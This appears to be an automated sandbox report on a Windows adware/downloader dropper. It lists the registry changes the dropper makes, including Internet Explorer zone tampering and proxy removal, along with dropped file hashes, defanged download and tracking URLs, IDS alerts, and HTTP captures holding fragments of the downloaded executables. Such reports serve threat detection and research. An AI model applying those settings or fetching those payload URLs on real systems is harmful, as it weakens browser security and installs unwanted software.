[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\vgkk]
"in1" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\tqrili]
"DisplayVersion" = "${PRODUCT_VERSION}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\tqrili]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\tqrili\uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 16 5B DF A7 58 79 D5 66 EE 7D 23 1E 93 A1 0B"

[HKLM\SOFTWARE\vgkk]
"g" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\tqrili]
"DisplayName" = "ÌìÆôÈÕÀú"
"URLInfoAbout" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process xkcc_50091167828.exe:2196 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 26 73 62 52 34 F8 65 5E C5 F8 DA 9A 5B B8 0C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%]
"Application Dataypfbyfgmr.exe" = "ainimei Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

MD5 File path
1ef9b76bcbf5cc9f01257ceaae19998e c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\2.0.1.1001\AppleDTAssistant.exe
2025b30e5b88dc462ed31bbc0192b123 c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\2.0.1.1001\AppleDesktop.exe
c6240767ccc6a1ed71dbd5cb6178d32c c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\AppleDTShellExt.dll
0e4521e149ac94328d1beab16f83445a c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\AppleDTShellExt64.dll
a9ef5e948fdc2fd84897174858d959d4 c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\Helper\AppleHelper.exe
9d3d5c2e13e92d330fbac22e1e2534d0 c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\Helper\dshow.exe
50f5a96bbc38592c5274b376fc35a5fb c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\Helper\mini.exe
5cebd6b9637597fae7058527b8d13ff7 c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\iApple.exe
552855ae554876f7d7ec0860147542b9 c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\uninst.exe
15b5cbaab65ab6bd15b36cec9ff11555 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\sjss\sjss.exe
05714e222ea2fdbf70414cc82b4fa9ab c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\sjss\uninstall.exe
ae3d0b0686f4b89c6bdcd69dfa8fc3b1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\a-zm-157391-v5[1].exe
58c77b4b19dba6c3a2971c0b3735fc45 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\axult[1].exe
430f63435575980f70192c4602af8f0b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\tqrl_89_177560[1].exe
6d6dbaafbdb27b66f2773203ae554b05 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\IFoxInstall-y-c203945859-run-s-x[1].exe
ecb3ddfae392af902d474849469561cb c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\axuls[1].exe
02aab2d719917873b95f7e285991ad62 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\sjss_jing_zhimeng_217[1].exe
e3778a31940fa71715d6160116404107 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\apples_5_1008[1].exe
181da1458ff21bf5fe0197cbd8a369c6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\setup_2948-140896[1].exe
c00935fa58f07e1912b5403e23b56a03 c:\Program Files\FM4.0\201409180317\DuiLib.dll
a6aa0ce59d41ae32aacb4870672abce0 c:\Program Files\FM4.0\201409180317\FHSev.exe
299d4ccd683231974ba6e2dc9b3ed79c c:\Program Files\FM4.0\201409180317\Unins.exe
4e21252ab923193b4fda81e4565b5401 c:\Program Files\FM4.0\201409180317\audio.dll
626eb51c0d3de4ba871f04a9aca8c5d5 c:\Program Files\FM4.0\201409180317\avcodec-54.dll
623fdb29b9965a145eb8bb40327c73a4 c:\Program Files\FM4.0\201409180317\avcore.dll
41d743562a515aeea619f53ddabb0440 c:\Program Files\FM4.0\201409180317\avformat-54.dll
5c9f02d245994a48af6502be4b40cd1b c:\Program Files\FM4.0\201409180317\avutil-52.dll
f02b692e92c1870071bfe7e7e2ff3948 c:\Program Files\FM4.0\201409180317\fm4.exe
d2dfe4ef36e03c9d18c333c3e754314a c:\Program Files\FM4.0\201409180317\fm4svr.exe
d2f7b09bb01aee3366a531acbfe0f131 c:\Program Files\FM4.0\201409180317\libav.dll
b82801876d49fb80044b84c142746efd c:\Program Files\FM4.0\201409180317\pthreadGC2.dll
d324717f930dd98013d786fb47d81d3f c:\Program Files\FM4.0\201409180317\source.dll
0f4aee47b55b4dcbf4a365f2c71de951 c:\Program Files\FM4.0\201409180317\swresample-0.dll
6d6dbaafbdb27b66f2773203ae554b05 c:\Program Files\fjwyusp\IFoxInstall-y-c203945859-run-s-x.exe
ae3d0b0686f4b89c6bdcd69dfa8fc3b1 c:\Program Files\fjwyusp\a-zm-157391-v5.exe
ecb3ddfae392af902d474849469561cb c:\Program Files\fjwyusp\axuls.exe
58c77b4b19dba6c3a2971c0b3735fc45 c:\Program Files\fjwyusp\axult.exe
61bb8719ef4107fef3038415b4660429 c:\Program Files\fjwyusp\fjwyusp.exe
e3778a31940fa71715d6160116404107 c:\Program Files\fjwyusp\hzsoft\apples_5_1008.exe
02aab2d719917873b95f7e285991ad62 c:\Program Files\fjwyusp\hzsoft\sjss_jing_zhimeng_217.exe
430f63435575980f70192c4602af8f0b c:\Program Files\fjwyusp\hzsoft\tqrl_89_177560.exe
919698fd27d7d63723a9407191b11420 c:\Program Files\fjwyusp\rnr20.dll
181da1458ff21bf5fe0197cbd8a369c6 c:\Program Files\fjwyusp\setup_2948-140896.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 67196 67584 4.54827 5c4d5ace2672731f58b9d31b4d21f13f
.rdata 73728 6101 6144 3.82125 019ad0f666e2ac17292e5d20e1bdf6c3
.data 81920 49140 512 2.45613 2821477811bfd11f4acd2c1da2aba6da
.CRT 131072 16 512 0.147711 324bcdad78da9eab2e1651550291e550
.rsrc 135168 15968 16384 2.49689 01295a5b863fa84cf5ba5849995fa5ca

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 4
0808a47e7121b9bb97477cdc66a9573f
fa6954afc23b8eb00d4e2b7ae8b5ad44
34b8cea184d1c315eaaa766888f0d691
603997420d04a16f1b040095040542a7

URLs

URL IP
hxxp://adsvc2.9365.info/ad/softad/popup.htm 219.239.223.191
hxxp://adsvc2.9365.info/count/softcount/?pwc 219.239.223.191
hxxp://c.split.cnzz.com/stat.php?id=4327411&web_id=4327411&show=pic
hxxp://z6.cnzz.com/stat.htm?id=4327411&r=&lg=en-us&ntime=none&cnzz_eid=921366142-1410999416-&showp=1276x846&t=&h=1&rnd=2115344014
hxxp://c.split.cnzz.com/core.php?web_id=4327411&show=pic&t=z
hxxp://cbjs.e.shifen.com/js/s.js
hxxp://icon.cnzz.com/img/pic.gif 42.156.162.7
hxxp://pcookie.split.cnzz.com/9.gif?abc=1&rnd=879903237
hxxp://adsvc2.9365.info/tc.htm 219.239.223.191
hxxp://pcookie.split.cnzz.com/app.gif?&cna=ehKhDDcf y8CAcGK9OfwIiB
hxxp://cb.e.shifen.com/ecom?di=98364&dcb=BAIDU_DUP_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=4&dai=1&dds=&drs=3&dvi=1410832926&ltu=http://adsvc2.9365.info/ad/softad/popup.htm&liu=&ltr=&lcr=&ps=13x8&psr=1276x846&par=1276x818&pcs=0x0&pss=20x30&pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=gb2312&cdo=-1&tsr=172&tlm=1352217204&tcn=1410999396&tpr=1410999395508&dpt=none&coa=&baidu_id=
hxxp://cbjs.e.shifen.com/painter/clb/popup7o.js
hxxp://adsvc2.9365.info/ad/softad/pwc.htm 219.239.223.191
hxxp://adsvc2.9365.info/dls/axuls.exe 219.239.223.191
hxxp://adsvc2.9365.info/dls/axult.exe 219.239.223.191
hxxp://download.grandcloud.cn/9291/25605/sjss_jing_zhimeng_217.exe 58.215.169.42
hxxp://adsvc2.9365.info/hzsoft/IFoxInstall-y-c203945859-run-s-x.exe 219.239.223.191
hxxp://183.61.184.37/02aab2d719917873b95f7e285991ad620000000000082370/9291/25605/sjss_jing_zhimeng_217.exe
hxxp://download.grandcloud.cn/9291/15474/setup_2949-14598.exe 58.215.169.42
hxxp://175.6.4.178/280cf9c20714744ccd17e57f66106dc70000000000370d38/9291/15474/setup_2949-14598.exe
hxxp://fbjuni.a.sohu.com/upgrade/IFoxInfo.cfg
hxxp://tclick.wauee.net/link/140896/setup_2948-140896.exe
hxxp://allot.hd.sohu.com/foxd/gz?file=SohuNewPlayer.exe&new=/212/10/LX1gaYhp2TxOw4UbWrnLg7.exe
hxxp://aaa.163vv.com/open/setup_2948-140896.exe
hxxp://58.216.27.32/sohu/s26h23eab6/ifox/TGogo6wdTGwyTAuHoaX1aa1yov-UE3tAkah9tliosGtNs91v/SohuNewPlayer.exe
hxxp://down.haoie.net/2suys_31_1008_01.exe 222.186.60.3
hxxp://updateinfo.yyhsj.cn/kbtongji.asp?sn=sjss_jing_zhimeng_217.exe&tmac=8a0c008b3729&action=kb&ver=0.4 59.53.63.26
hxxp://down.haoie.net/apples_5_1008.exe 222.186.60.3
hxxp://inapi.9vh.net/index.php?encode=NDk5NjI1KlllcyxwY2EqMDSwDtMEMtMjktIkLEEtIkLEItMzcscG9kKjUsdW9kKjEwMDgsb3MqV2luZG93cyBYUCxwb2lzb24qLHN0YXTgF1cyoxLGxpc3QqQzpcTgFG9jdW1lbnTgFzIGFuZCBTZXTgF0aW5nc1xhZG1cQXBwbGljYXTgFpb24gTgFGF0YVxBcHBsZUTgFlc2t0b3SwDSwD&process=apples_5_1008.exe 222.186.60.74
hxxp://stat.eliang.com/cstat.php 14.18.141.126
hxxp://inapi.9vh.net/index.php?encode=NTSwDwNDg0KlllcyxwY2EqMDSwDtMEMtMjktIkLEEtIkLEItMzcscG9kKjUsdW9kKjEwMDgsb3MqV2luZG93cyBYUCxwb2lzb24qLHN0YXTgF1cyoyLGxpc3QqQzpcTgFG9jdW1lbnTgFzIGFuZCBTZXTgF0aW5nc1xhZG1cQXBwbGljYXTgFpb24gTgFGF0YVxBcHBsZUTgFlc2t0b3SwDSwD&process=apples_5_1008.exe 222.186.60.74
hxxp://inapi.9vh.net/index.php?encode=NTSwDwNTSwDwKlllcyxwY2EqMDSwDtMEMtMjktIkLEEtIkLEItMzcscG9pc29uKixWZXJzaW9uKjIuMC4xLjEwMDEsbGFzdF90aW1lcyoxNDEwIkLTk5NDIzLHN0YXTgF1cyoySwDSwDQegZ27vc&process=apples_5_1008.exe 222.186.60.74
hxxp://sinaapp.com/dc/run/start/2.0.1.1001/c654925393ae14277410758bb43bb4ec/2561/28/1970-1-1/?
hxxp://sinaapp.com/dc/setup/install/2.0.1.1001/c654925393ae14277410758bb43bb4ec/2561/28/1970-1-1/?result=succ
hxxp://c06.i06.arnic.hadns.net/tqrl_89_177560.exe
hxxp://client-b.jtdichan.com/packages/g_wz/default2/a-zm-157391-v5.exe 61.147.97.229
hxxp://update.yinyue.fm/DM15/DMSet.Xml 222.186.60.13
hxxp://update.163vv.com/stj.ashx?v=1.14.820.1&t=41
hxxp://c06.i06.arnic.hadns.net/0815/help1.html
hxxp://down.chinashangrui.com/xkgb/xkcc_50091167828.exe 222.186.60.77
hxxp://www.meimotuan.com/ico.ico 114.215.202.132
hxxp://down.chinashangrui.com/xkna/xkna_50091167828.exe 222.186.60.77
hxxp://tongji.yinyue.fm/a.ashx?v=51856086832E9ADB347D74A1629E1CFEB5DC550C165417452F22832D24A951CAAFFC03962B62E52CCBF64CA69B5AF643186FDCD5FBEAC2F2F99B14F7904EE489ACB7D5F447E350A705904461522CDC97865D9D861FB35CB7248760DE2BB230184CB1882A5F42401CB6EB7ECD8659BA964F712249A8AFF852125B284DE3F595E4604E0B1FF6D36DC4 171.111.158.28
hxxp://update.yinyue.fm/appupdate/ver.txt 222.186.60.13
hxxp://update.163vv.com/fwtj.ashx?v=1.14.820.1
hxxp://dx5.3525.com/tjapis.php?mac=000C298A8B37&st=1&exez=tqrl_89_177560.exe&exef=axuls.exe&pass=7a41a5df85b86824a6d2d5418a8cd43e&url1=hxxp://ya.ru/&url2=ya
hxxp://API.TUPIAN8.CN/report/install
hxxp://update.yinyue.fm/Update.rar 222.186.60.13
hxxp://20140918081631105.wangendong.com/htop/htop_x.exe 60.221.255.11
hxxp://API.TUPIAN8.CN/report/use
hxxp://s.sogv.com/ext/ext.7z 59.53.63.20
hxxp://API.TUPIAN8.CN/client/jstm/1.1.0.0a-zm-157391-v5.exe
hxxp://union.yoyolm.net/tjapis.php?mac=000C298A8B37&st=1&exez=tqrl_89_177560.exe&exef=axuls.exe&pass=7a41a5df85b86824a6d2d5418a8cd43e&url1=hxxp://ya.ru/&url2=ya 222.186.130.92
hxxp://s85.cnzz.com/stat.php?id=4327411&web_id=4327411&show=pic 1.99.192.16
hxxp://219.239.223.191/dls/axuls.exe
hxxp://updatetest.wuji.com/stj.ashx?v=1.14.820.1&t=41 219.232.242.219
hxxp://cbjs.baidu.com/js/s.js 123.125.65.120
hxxp://219.239.223.191/hzsoft/IFoxInstall-y-c203945859-run-s-x.exe
hxxp://API.TUPIAN8.CN/config/iplocater
hxxp://photocdn.hd.sohu.com/upgrade/IFoxInfo.cfg 61.135.181.167
hxxp://appledesktop.sinaapp.com/dc/setup/install/2.0.1.1001/c654925393ae14277410758bb43bb4ec/2561/28/1970-1-1/?result=succ 220.181.136.30
hxxp://API.TUPIAN8.CN/config/juese/adconf
hxxp://www.tonnn.com/client/jstm/1.1.0.0a-zm-157391-v5.exe 61.147.97.233
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=879903237 42.120.219.171
hxxp://wcapi.9vh.net/index.php?encode=NTSwDwNTSwDwKlllcyxwY2EqMDSwDtMEMtMjktIkLEEtIkLEItMzcscG9pc29uKixWZXJzaW9uKjIuMC4xLjEwMDEsbGFzdF90aW1lcyoxNDEwIkLTk5NDIzLHN0YXTgF1cyoySwDSwDQegZ27vc&process=apples_5_1008.exe 222.186.60.74
hxxp://pcookie.cnzz.com/app.gif?&cna=ehKhDDcf y8CAcGK9OfwIiB 42.120.219.171
hxxp://updatetest.wuji.com/fwtj.ashx?v=1.14.820.1 219.232.242.219
hxxp://adsvc1.haoda123.com/tc.htm 219.239.223.191
hxxp://down.9vh.net/apples_5_1008.exe 222.186.60.3
hxxp://219.239.223.191/dls/axult.exe
hxxp://down.yinyue.fm/open/setup_2948-140896.exe 222.186.60.18
hxxp://c.cnzz.com/core.php?web_id=4327411&show=pic&t=z 42.156.140.11
hxxp://appledesktop.sinaapp.com/dc/run/start/2.0.1.1001/c654925393ae14277410758bb43bb4ec/2561/28/1970-1-1/? 220.181.136.30
hxxp://dup.baidustatic.com/painter/clb/popup7o.js 123.125.65.120
hxxp://update.yoyolm.net/0815/help1.html 183.57.148.247
hxxp://cb.baidu.com/ecom?di=98364&dcb=BAIDU_DUP_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=4&dai=1&dds=&drs=3&dvi=1410832926&ltu=http://adsvc2.9365.info/ad/softad/popup.htm&liu=&ltr=&lcr=&ps=13x8&psr=1276x846&par=1276x818&pcs=0x0&pss=20x30&pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=gb2312&cdo=-1&tsr=172&tlm=1352217204&tcn=1410999396&tpr=1410999395508&dpt=none&coa=&baidu_id= 123.125.115.99
hxxp://down.tianyunxj.com/tqrl_89_177560.exe 116.11.254.249
hxxp://data.vod.itc.cn/foxd/gz?file=SohuNewPlayer.exe&new=/212/10/LX1gaYhp2TxOw4UbWrnLg7.exe 220.181.61.213
hxxp://click.t3nlink.com/link/140896/setup_2948-140896.exe 61.147.97.228
hxxp://hzs2.cnzz.com/stat.htm?id=4327411&r=&lg=en-us&ntime=none&cnzz_eid=921366142-1410999416-&showp=1276x846&t=&h=1&rnd=2115344014 42.156.140.19
api.tupian8.cn 61.147.97.233
lct.mnxc8.net 103.250.12.212
static.tonnn.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET MALWARE Possible Windows executable sent when remote host claims to send html content
ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/4.0)
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /index.php?encode=NTSwDwNTSwDwKlllcyxwY2EqMDSwDtMEMtMjktIkLEEtIkLEItMzcscG9pc29uKixWZXJzaW9uKjIuMC4xLjEwMDEsbGFzdF90aW1lcyoxNDEwIkLTk5NDIzLHN0YXTgF1cyoySwDSwDQegZ27vc&process=apples_5_1008.exe HTTP/1.1
Host: wcapi.9vh.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Sep 2014 00:17:27 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
0..HTTP/1.1 200 OK..Server: nginx..Date: Thu, 18 Sep 2014 00:17:27 GMT
..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..
Connection: keep-alive..Vary: Accept-Encoding..Vary: Accept-Encoding..
X-Powered-By: PHP/5.3.28..0..



POST /config/iplocater HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0
Host: API.TUPIAN8.CN
Content-Type: application/x-www-form-urlencoded


HTTP/1.1 302 FOUND
Server: nginx/1.2.0
Date: Thu, 18 Sep 2014 00:17:57 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 219
Connection: close
Location: hXXp://API.TUPIAN8.CN/login
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">.<titl
e>Redirecting...</title>.<h1>Redirecting...</h1>.
<p>You should be redirected automatically to target URL: <a h
ref="/login">/login</a>.  If not click the link...



GET /sohu/s26h23eab6/ifox/TGogo6wdTGwyTAuHoaX1aa1yov-UE3tAkah9tliosGtNs91v/SohuNewPlayer.exe HTTP/1.1
Accept: */*
Connection: Keep-Alive
Cache-Control: no-cache
Host: 58.216.27.32


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Sep 2014 00:17:12 GMT
Content-Type: application/octet-stream
Content-Length: 16733640
Last-Modified: Wed, 13 Aug 2014 16:11:05 GMT
Connection: keep-alive
ETag: "53eb8e19-ff55c8"
Expires: Fri, 16 Jan 2015 00:17:12 GMT
Cache-Control: max-age=10368000
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........)...G...G.
..G.......G.......G.......G..;*...G..;<...G...F.;.G.......G.......G
.......G.......G.Rich..G.........PE..L......R.....................~...
....7............@.......................................@............
.............p....t...............0...........@[email protected]........
...........................@..........................................
..text............................... ..`.rdata...~...................
.......@[email protected]... ....P...<[email protected]......
.2...~..............@[email protected]..<....@[email protected]...
......................................................................
......................................................................
......................................................................
......................................................................
...........................................................I..........
...............S.\$.V.....t .F.Wh..B..~.Pj.V.$......t.W.|........_^[..
.....I....t.V..........^[..................d.I...........V....d.I.....
..D$..t.V.C........^...............j.hH G.d.....PQV..PL.3.P.D$.d......
..t$......3..D$..N...p.I.j..A..A.....P.A..D$$P........L$.d......Y^....
........y$.r..A...A.....D$.VP...s.....|.I...^..........V....p.I..~$.r.
.F.P.v......3..F$.....F .F...^.......................I................
.I............L$.....I..Q..P...............S.\$.V.....t .F.Wh..@..
<<< skipped >>>


GET /xkgb/xkcc_50091167828.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.chinashangrui.com
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 17 Sep 2014 23:53:10 GMT
Content-Type: text/html
Content-Length: 154
Connection: keep-alive
Keep-Alive: timeout=20
Location: hXXp://down.chinashangrui.com/xkna/xkna_50091167828.exe
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>nginx</center&g
t;..</body>..</html>......


GET /xkna/xkna_50091167828.exe HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.chinashangrui.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Wed, 17 Sep 2014 23:53:10 GMT
Content-Type: application/octet-stream
Content-Length: 3465728
Last-Modified: Sun, 24 Aug 2014 08:48:04 GMT
Connection: keep-alive
Keep-Alive: timeout=20
ETag: "53f9a6c4-34e200"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
......C.......v.......w._.....N.........c.....r.......G.......@.....Ri
ch....................PE..L......S......................3......F......
[email protected]...@.......................
...........4..d.......\H3...................4.........................
.............*[email protected].
.......................... ..`.rdata...=.......>..................@
[email protected]=...@.......,[email protected]...\H3......J3..D.....
.........@[email protected][email protected].................
......................................................................
......................................................................
......................................................................
......................................................................
.................................................P..$.................
[email protected]. [email protected]............_
[email protected]. [email protected]..!.............
...AB..u.....U..j.h..@.d.....P...VW..DA.3.P.E.d...........E.....W.}...
.........u.....E..E.......xg.M..Q. .;.}[.u.FV.....V..j.W.*A...M....E..
U.PRW..!......u..,...W.}#[email protected].. W.{..E...
.....................u.V.5#........M.d......Y_^..].........U..QVW.....
...I..F.P......U..M.QR..VW..#......E...y W..".................~._.
<<< skipped >>>


GET /ext/ext.7z HTTP/1.1
User-Agent: DownLoad
